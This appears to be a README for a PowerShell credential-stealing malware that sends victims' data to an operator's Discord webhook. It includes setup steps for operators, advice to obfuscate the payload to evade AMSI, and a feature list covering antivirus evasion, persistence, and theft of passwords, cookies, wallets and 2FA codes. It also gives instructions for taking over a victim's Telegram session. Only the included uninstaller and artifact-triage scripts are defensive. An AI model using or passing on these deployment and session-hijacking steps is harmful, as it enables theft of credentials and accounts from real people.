Malware targeting Windows systems that uses PowerShell for data exfiltration. All collected information is sent to the operator through Discord webhooks.
Important: As of 2024-02-14, PowerShell-Token-Grabber is detected by AMSI (malware-encyclopedia). You need to obfuscate the generated payload in order to use it effectively.
- Create a webhook on your Discord server (creating a new server is recommended): Edit Channel > Integrations > Webhooks > Create Webhook.
- Copy the Webhook URL.
- Download main.ps1.
- Open main.ps1 and replace YOUR_WEBHOOK_HERE on line 30 with your webhook URL, or use the builder.
- Obfuscate the payload: use Invoke-Obfuscation for .ps1 files, or Somalifuscator for .bat files.
- Obfuscation of BAT and PS1 files
- Compilation of EXE files
- Pump/inject the output EXE file with zero-filled bytes
- GUI builder
- Anti-Kill (terminating the grabber causes a system crash, i.e. a BSoD, blue screen of death)
- Mutex (single instance)
- Force UAC
- Antivirus evasion: disables AMSI, adds itself as a Windows Defender exclusion, and blocks access to antivirus websites via the hosts file
- Anti-analysis: VMware, VirtualBox, sandboxes, emulators, debuggers, VirusTotal, Any.run
- Persistence via Task Scheduler
- Extracts WiFi passwords
- File stealer: 2FA, backup codes, seed phrases, passwords, private keys, etc.
- Webcam and desktop screenshots
- Session stealers
- VPN clients
- Crypto wallets: Armory | Atomic | Bitcoin | Bytecoin | Coinomi | Dash | Electrum | Ethereum | Exodus | Guarda | Jaxx | Litecoin | Monero | Zcash
- Browsers (Brave, Chrome, Firefox, Microsoft Edge, Thunderbird, etc.): passwords, cookies, history
- Extracts Discord token
- System information (version, CPU, disk, GPU, RAM, IP, installed apps, etc.)
- List of installed applications
- List of installed antiviruses
- List of all network adapters
- List of apps that run on startup
- List of running services and applications
- All network information
- Extracts product key
- Self-destructs after execution (optional)
After the exfiltrated data has been uploaded to your Discord webhook, download the compressed file KDOT.zip and extract it on your PC. Inside the extracted folder there is a subfolder named Messaging Sessions, which contains a Telegram folder.
Copy the tdata folder from the Telegram folder and paste it into the directory below:
%userprofile%\AppData\Roaming\Telegram Desktop
Before pasting the tdata folder, delete the existing tdata folder on your PC, otherwise the stolen session will not replace your own.
Note: the other session stealers can be used by applying the same technique.
- Open a new elevated PowerShell console, then copy and paste the contents below. Note that the script restores the Windows default hosts file wholesale, so any legitimate custom hosts entries on the machine are lost as well; back them up first if you need them.

```powershell
$ErrorActionPreference = "SilentlyContinue"

function Cleanup {
    # Remove the scheduled task the grabber registers for persistence
    Unregister-ScheduledTask -TaskName "KDOT" -Confirm:$False

    # Remove the staging directory and the Windows Defender exclusions the grabber added
    Remove-Item -Path "$env:APPDATA\KDOT" -Force -Recurse
    Remove-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
    Remove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"

    # Overwrite the hosts file with the Windows default to undo the antivirus-website blocks
    $resethostsfile = @'
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
'@
    [IO.File]::WriteAllText("$env:windir\System32\Drivers\etc\hosts", $resethostsfile)

    Write-Host "[~] Successfully Uninstalled !" -ForegroundColor Green
}

Cleanup
```
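The uninstaller above doubles as a list of host indicators: a scheduled task named KDOT, a staging folder at %APPDATA%\KDOT, Defender exclusions for that folder and %LOCALAPPDATA%\Temp, and a modified hosts file. The following triage script is an added example and is not part of PowerShell-Token-Grabber; it checks for exactly those artifacts and returns a list of findings rather than removing anything. The function name, the output format, and the assumption that blocked antivirus sites are pointed at a loopback or null address (127.0.0.1, 0.0.0.0, ::1) are this example's own choices; the page does not say which addresses the grabber writes. Run it from an elevated console so Get-MpPreference and the hosts file are readable.

```powershell
# Added triage example (not the project's own code): looks for the artifacts the
# uninstaller removes and reports them. Names and paths come from that script; the
# loopback/null address list for hosts-file blocks is an assumption.
$ErrorActionPreference = 'SilentlyContinue'

function Find-GrabberArtifacts {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Persistence: scheduled task named "KDOT" (report what it executes)
    $task = Get-ScheduledTask -TaskName 'KDOT'
    if ($task) {
        foreach ($action in $task.Actions) {
            $findings.Add("Scheduled task 'KDOT' runs: $($action.Execute) $($action.Arguments)")
        }
    }

    # 2. Staging directory under %APPDATA%
    $stage = Join-Path $env:APPDATA 'KDOT'
    if (Test-Path $stage) {
        $findings.Add("Staging directory present: $stage")
    }

    # 3. Defender path exclusions the grabber adds for itself and for %LOCALAPPDATA%\Temp
    $exclusions = @((Get-MpPreference).ExclusionPath)
    foreach ($path in @($stage, (Join-Path $env:LOCALAPPDATA 'Temp'))) {
        if ($exclusions -contains $path) {
            $findings.Add("Defender exclusion present: $path")
        }
    }

    # 4. hosts-file tampering. A default Windows hosts file contains only comments, so any
    #    active entry is worth reporting; an entry that maps a hostname to a loopback or
    #    null address matches the "block antivirus websites" behaviour described above.
    $hostsPath = Join-Path $env:windir 'System32\drivers\etc\hosts'
    foreach ($line in (Get-Content -Path $hostsPath)) {
        # -notmatch first so $Matches still holds the capture groups from -match
        if ($line -notmatch '^\s*#' -and $line -match '^\s*(\S+)\s+(\S+)') {
            $addr = $Matches[1]
            $name = $Matches[2]
            if ($addr -in @('127.0.0.1', '0.0.0.0', '::1')) {
                $findings.Add("hosts file redirects $name to $addr (possible AV site block)")
            } else {
                $findings.Add("hosts file has active entry: $addr $name")
            }
        }
    }

    return $findings
}

$result = Find-GrabberArtifacts
if ($result.Count -eq 0) {
    Write-Host '[+] No PowerShell-Token-Grabber artifacts found' -ForegroundColor Green
} else {
    $result | ForEach-Object { Write-Host "[!] $_" -ForegroundColor Yellow }
}
```

The checks only cover the default names in the uninstaller; a build that was renamed or obfuscated with the builder may use a different task name and folder, so treat a clean result as "no default artifacts" rather than "not infected". Defender exclusions and active hosts entries are worth reviewing on any machine, since neither should normally be present on a default install.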
Found a bug? Have an idea? Let me know here. Please provide a detailed explanation of the expected behavior, the actual behavior, and the steps to reproduce, or describe what you want to see and how it could be done. You can be a small part of this project!
This project is licensed under the MIT License - see the LICENSE file for details
I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this tool was created for educational purposes only. This tool's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.
YARA Rule Info
- Name: SUSP_PS1_PowerShell_Recon_Mar23_1
- Rule Hash: eda1df8e3375891644fe9cac90852b0d
- Description: Detects suspicious PowerShell code that performs reconnaissance tasks
- Rule Link: https://valhalla.nextron-systems.com/info/rule/SUSP_PS1_PowerShell_Recon_Mar23_1
- Rule Author: Florian Roth